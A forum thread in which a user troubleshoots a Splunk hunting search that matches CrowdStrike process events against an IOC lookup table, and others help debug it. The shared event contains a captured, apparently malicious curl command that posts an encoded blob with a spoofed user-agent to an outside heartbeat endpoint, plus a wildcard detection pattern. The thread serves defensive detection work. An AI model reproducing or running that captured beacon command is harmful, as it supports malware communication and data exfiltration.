Please share the event which was supposed to have matched and the entry in the lookup that it should have matched to

Here is the event:
{"ChangeTime":"159019401599.660","CapPrm":"274877906943","ParentProcessId":"41312874540918","SourceProcessId":"41312874540918","aip":"167.8.84.8","SessionProcessId":"41312874540918","SHA1HashData":"0000000000000000000000000000000000000000","event_platform":"Lin","ProcessEndTime":"1715545935.034","SVUID":"0","EventOrigin":"1","id":"92d99f91-6970-4f66-a38a-762e6b2af7b9","EffectiveTransmissionClass":"2","Tags":"12094627905582, 12094627906234","timestamp":"1715545919041","ProcessGroupId":"32517225337224","event_simpleName":"ProcessRollup2","RawProcessId":"17459","RootPath":"/","GID":"0","SVGID":"0","MD5HashData":"b194675c8ea858f2ed21214e9bbfc16b","SHA256HashData":"14ac73386c9ca706968f2ad2bd2a861f37659d669756e730fe2747d3b726f1da","UID":"0","CommandLine":"curl -g -k -H user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705;) --connect-timeout 5 -d status=IYtBsvtfYai1wFsAeUU1ad8hCB8fX2hRrPvM%2bfwQVOb30LoDJluceAyV5jg75J8bHbinyYONJqjAbsrxiZwsLcFKHE59NwzNLLBkZ88ZBNu%2bc%2bGO2WxnITbXkXZyQJkMbdXlnnAwJ602gWkuOhmsiw3Ft5c%2b4Tduq615Hllj4u5whtm9TQxay%2bOQy4mVeJ7tfurRODGqsHw6mlsjXSpmgNUA5cSDVkiuc1pCzMugiOur5Dh2XoG7ABj%2bfEjEBe33hjD6431XFaKA8YkUoLJ424pYBhiFc%2bSK7Xd1csiCYwK4jwO98E4%2f8vLn37nFw8a2Uwiy8lOeP1e1skwDMccJR7jhAndmIQtSL1GruLm9lUpGwt%2b%2bmm%2bwawKl6NEca%2bNLJeWq7EcnfpPsZzPkV9kpyPu8Pz2mrZy%2fkKoXUEoeP0IOg6sRDrYu4%2bDNhcLT3znS8OqBxi%2bZypOcnABSwamvRXP048qJHQx7pm7yPkMaG20VjGtP48RUNGM2jloRNtbgHfJW2D3BmRp2De8rNRp5fdnzKB0i%2fUfYQ%2fWbLxYoZ4LQv3YEvT6XssTi1yScdJj3miAD%2b9Q5y4R1%2fLKUO9BUIeKvf0Zm23k7BSiqznd2skvuqUo4gb6JPwPW4zpctCiAKwZlKDY4AbZe1gBkJJWrrv%2bJ8VJTP37W5fTFtsqqTEc8ziL40%2bvqes1NLAiSEN31ABppkOmgZtkPXrC42utxYLjeMC06Raic6iLmymZo%2f5UrD31SshEm5k6KvVdZ2Bf%2fsPPjsf8uXfzhTxDmvWgYcVAkbvsukaVBQcrvqxXd1zSKbgTWEO41uXWdPSNqZtHj2TubS%2flCikiJPYX1zMhjsFFvkGlPIyTz%2bgCvm3JzLlcVT%2fLWJ216l4ozrD0%2b2Gq4wHuUlE8zcHZo00Vo9ysmAqEQ8HoWVzr1ZRRY7Lfn%2bhS0V7Uvlt65JDEm%2bA3aRcwNDBiNjkYNrU3LfTnBdCKgE1b8qpzcwoJMuPNadSZLPa3gKP%2fLXWNN266rW%2f1bqg5exR%2bk8D2ipueAUYYuJlCvsyvvU%2bh%2fF6zyJzqKN8zpy1tWtpGPBzFEbxixjBozX3LfficGlz1hDuLEclKKpH8rpOHSwsXrHGX%2fEiN5NRx4tPyR%2bGWmPMXm94ZazpH153EW0ixtQNaJJBBkR1Jmave6xacXustk9Tz67EcB0cPY2cEL%2bKzTVm%2fv7mEJRO2ohkzGmfBYsncbzBB3CssQp%2fSNcOoX%2fFl%2bBKiA3YSGiOuLv4nPG84PkfOKwTd7irZF3evTl4GEg8Ajkm54fMf5kFY1v3fH3b9NfPwZDMlDKOCNMYJuhXmglCdI1FQsJiIlyPZVrY21YcmQgGfJT7Bau64wq%2bHfP2p9P1oyU4%2f3mkH3tkWb%2bL754Ss%2fIRl%2fFFY9rOHOt7kBphaFgB9JEaoxFTtIYy%2fT66BXmr957lKlBiJg08FYBYE1PR6%2bPwMiCftCu2tdU3HulvTGR1Exc4shovJAVgq6iwWYHmpZo%2bqRuM8cz1itutz%2b%2bm7ZQDlbaiU1%2bSvDGOgBU%2f423vojnbrHKb6hYQIS%2bGrSBUuJBeZHLiKOfkPfsFvNYZIcmD%2bRkNCgwf4nTooOIY5GffKGH0LOPeT8RZzOcytEBjyu9%2fMQVIonZMc73lavnz7uPCRtGiezB%2fjkFj5UkSplosXjlN%2fyQbfoR5RQhUcgVKQpoSGrSUeT%2bSRyrV5QBtDwHTykUIzAUu%2bUvC3Vfwe0Oz24TCTfRFm%2bKhHGEt7v9PB8NZ0oCzkMwR6VerNptlspoWGjr91j0OXB6hlxjDxOD%2bIrZMNKpfunrfOgXZEIywAf18sgF0O6Xgo%3d --retry 0 -L http://wvcfg.wetmet.net/api/serverservice/heartbeat.php?serverid=1u%2bYbg%2bn25POYs4MAuxnjxQMMDoNMbh...

It should match with this lookup entry:

It does matches but I am just not able to display command and description in my final result.

Thank you

If you change your lookup entry to

*wmic*get*http*

does it match?

Yes, it does matches, but I am struggling with displaying command and description in final result.

As per my logic above when I use the  | table CommandLine, commands, description ---- it just displays CommandLine, and column commands, description comes as blank.

I am not sure I understand - if it matches, what gets returned?

Also, what permissions/scope do you have on you have on your lookup file and lookup definition? (Make sure they are accessible by all apps)

Hi -

To explain, we have ioc_check table with over 100 commands, we are matching this commands with CrowdStrike CommandLine as a hunting perspective. This is the SPL we have which alerts us when CommandLine matches with commands string from lookup table.

index=crowdstrike event_simpleName=ProcessRollup2 [| inputlookup ioc_check | eval CommandLine="*"+commands+"*" | fields CommandLine] | lookup ioc_check commands AS CommandLine OUTPUT description | table  CommandLine, commands, description

The results we are getting as:

However, the result we want as this:

Also, we have Global permissions to All apps for both Lookup table and definition.

The CommandLine example you have shown does not match the lookup wildcard string you have shown so it is not surprising that you don't get any results returned from the lookup.

Also, if the commands lookup field already contains leading and trailing * there should be no need to add them to the CommandLine filter in the subsearch.